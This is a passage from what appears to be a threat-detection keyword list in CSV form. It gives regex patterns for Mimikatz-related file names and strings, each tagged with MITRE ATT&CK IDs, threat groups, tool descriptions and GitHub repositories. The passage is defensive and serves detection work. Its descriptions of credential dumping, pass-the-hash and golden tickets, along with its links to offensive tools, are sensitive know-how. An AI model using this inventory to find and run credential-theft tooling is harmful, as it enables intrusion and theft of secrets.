"*mimidrv.sys*",".{0,1000}mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52011"
"*mimidrv.zip*",".{0,1000}mimidrv\.zip.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52012"
"*mimikatz 2.2.0 x64*",".{0,1000}mimikatz\s2\.2\.0\sx64.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52013"
"*mimikatz -Command *",".{0,1000}mimikatz\s\-Command\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","52014"
"*mimikatz for Windows*",".{0,1000}mimikatz\sfor\sWindows.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52015"
"*Mimikatz*",".{0,1000}Mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets.","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52016"
"*Mimikatz.cs*",".{0,1000}Mimikatz\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","52017"
"*mimikatz.dll*",".{0,1000}mimikatz\.dll.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","52018"
"*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","52019"
"*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52020"
"*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","52021"
"*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52022"
"*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","52023"
"*mimikatz.log*",".{0,1000}mimikatz\.log.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","52024"
"*mimikatz.log*",".{0,1000}mimikatz\.log.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","N/A","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","52025"
"*mimikatz.py*",".{0,1000}mimikatz\.py.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","1","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","52026"
"*mimikatz.py*",".{0,1000}mimikatz\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","52027"
"*mimikatz.raw*",".{0,1000}mimikatz\.raw.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","52028"
"*mimikatz_cred_collector.py*",".{0,1000}mimikatz_cred_collector\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52030"
"*mimikatz_dotnet2js*",".{0,1000}mimikatz_dotnet2js.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","52031"
"*mimikatz_dynwrapx*",".{0,1000}mimikatz_dynwrapx.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","52032"
"*mimikatz_tashlib*",".{0,1000}mimikatz_tashlib.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","52033"
"*mimikatz_trunk*",".{0,1000}mimikatz_trunk.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52034"
"*mimikatz_trunk.7z*",".{0,1000}mimikatz_trunk\.7z.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archive names","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52035"
"*mimikatz_trunk.zip*",".{0,1000}mimikatz_trunk\.zip.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archive names","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52036"
"*mimikatz_x64.dll*",".{0,1000}mimikatz_x64\.dll.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","52037"
"*mimikatz_x64.exe*",".{0,1000}mimikatz_x64\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52038"
"*mimikatz_x86.dll*",".{0,1000}mimikatz_x86\.dll.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","52039"
"*mimikatz_x86.exe*",".{0,1000}mimikatz_x86\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52040"
"*MimikatzByPowerShellForDomain.py*",".{0,1000}MimikatzByPowerShellForDomain\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52041"
"*mimikatz-obf.exe*",".{0,1000}mimikatz\-obf\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","52042"
"*MimikatzOnLocal.py*",".{0,1000}MimikatzOnLocal\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52043"
"*MimikatzStream should be at offset *",".{0,1000}MimikatzStream\sshould\sbe\sat\soffset\s.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","#content","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","52044"
"*mimikatzsvc*",".{0,1000}mimikatzsvc.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52045"
